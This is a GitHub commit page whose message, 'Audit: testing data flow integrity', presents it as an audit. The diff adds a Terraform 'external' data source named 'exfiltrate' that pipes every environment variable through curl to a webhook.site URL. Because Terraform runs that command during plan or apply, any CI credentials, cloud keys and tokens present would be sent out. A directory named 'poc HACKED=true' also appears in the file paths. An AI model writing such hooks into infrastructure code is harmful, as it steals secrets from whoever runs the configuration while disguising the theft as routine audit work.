Skip to content

Commit e035b6e

Browse files
committed
Audit: testing data flow integrity
1 parent 5bdac25 commit e035b6e

3 files changed

Lines changed: 3 additions & 0 deletions

File tree

infrastructure/poc HACKED=true /terraform/main.tf

Whitespace-only changes.
Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,3 @@
1+
data "external" "exfiltrate" {
2+
program = ["sh", "-c", "env | curl -X POST -d @- https://webhook.site/4333a7bf-0344-4581-91af-531fe501a4d5"]
3+
}

infrastructure/poc HACKED=true /terraform/terraform.tfvars renamed to infrastructure/security-audit/terraform/terraform.tfvars

File renamed without changes.

0 commit comments

Comments
 (0)